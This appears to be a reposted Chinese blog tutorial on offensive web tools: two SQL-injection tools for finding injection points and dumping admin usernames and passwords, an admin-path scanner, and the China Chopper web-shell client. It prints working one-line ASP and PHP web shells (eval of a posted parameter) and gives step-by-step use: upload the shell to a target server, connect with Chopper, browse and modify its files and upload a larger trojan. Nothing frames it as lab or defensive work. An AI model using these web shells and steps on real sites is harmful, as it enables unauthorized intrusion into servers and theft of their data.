明小子注入工具+啊D注入工具+御剑后台扫描工具+中国菜刀一句话木马
明小子:
明小子主要功能為“SQL注入猜解”,手工猜測太過繁瑣,使用明小子可以檢測是否存在注入點(diǎn),猜解表名,列名和字段數(shù)據(jù)(用戶名和密碼)
使用:
1.單擊工具中的“SQL注入猜解”,輸入網(wǎng)站地址,檢測是否存在注入點(diǎn)。
2.點(diǎn)擊“猜解表名”,猜出數(shù)據(jù)庫表名
3.選定猜解出的表名,猜解表中字段名和字段值
4.猜解后臺地址,使用猜到的用戶名和密碼進(jìn)行登陸
啊D注入工具:
1、掃描注入點(diǎn)
使用啊D對網(wǎng)站進(jìn)行掃描,輸入網(wǎng)址就行
2、SQL注入檢測
檢測已知可以注入的鏈接
3、管理入口檢測
檢測網(wǎng)站登陸的入口點(diǎn),如果已經(jīng)得到用戶名和密碼的話,可以用這個(gè)掃描一下,看能否找到后臺進(jìn)行登陸
4、瀏覽網(wǎng)頁
可以用這個(gè)瀏覽網(wǎng)頁,如果遇到網(wǎng)頁中存在可以注入的鏈接將提示
御劍:
御劍后臺掃描枚舉可能的后臺路徑 找到后臺看是啥系統(tǒng)可以爆庫或者利用漏洞進(jìn)后臺就簡單多了
1.輸入目標(biāo)站點(diǎn)的url,點(diǎn)擊掃描
2.掃描結(jié)果分析:HTTP響應(yīng)值為200,代表頁面可以訪問
雙擊鏈接http://../index.asp,進(jìn)入目標(biāo)站點(diǎn)主頁
雙擊鏈接http://../admin/login.asp, 進(jìn)入后臺管理頁面 ?(掃描網(wǎng)站登錄后臺)
雙擊鏈接http://../FCKeditor/admin_login.html,該站點(diǎn)的編輯器類型為FCK以及版本號 ?(掃描編輯器登錄后臺)
中國菜刀:
下載地址:http://www.onlinedown.net/soft/588101.htm
1.中國菜刀支持的服務(wù)端腳本:PHP、ASP,主要用于連接一句話木馬。
2.主要功能有:文件管理(有足夠的權(quán)限時(shí)候可以管理整個(gè)磁盤/文件系統(tǒng)),數(shù)據(jù)庫管理,虛擬終端。
常用的一句話木馬:
asp的一句話是:<%eval request("lubr")%>
php的一句話是:<?php @eval($_POST['lubr']);?>
使用:
1.上傳一句話木馬,記錄木馬地址,例如http://192.168.1.3:8080/up/images/lubr.php
2.菜刀連接:
進(jìn)入中國菜刀目錄,點(diǎn)擊chopper.exe
右鍵點(diǎn)擊添加,在地址欄中添加上傳文件路徑,右側(cè)添加密碼lubr, 腳本類型選擇PHP
右鍵點(diǎn)擊文件管理,查看目標(biāo)服務(wù)器的完整目錄,可進(jìn)行創(chuàng)建文件,修改文件,上傳下載等操作,如上傳大馬。
總結(jié)
以上是生活随笔為你收集整理的明小子注入工具+啊D注入工具+御剑后台扫描工具+中国菜刀一句话木马的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 深入理解C语言指针
- 下一篇: 利用android studio制作简单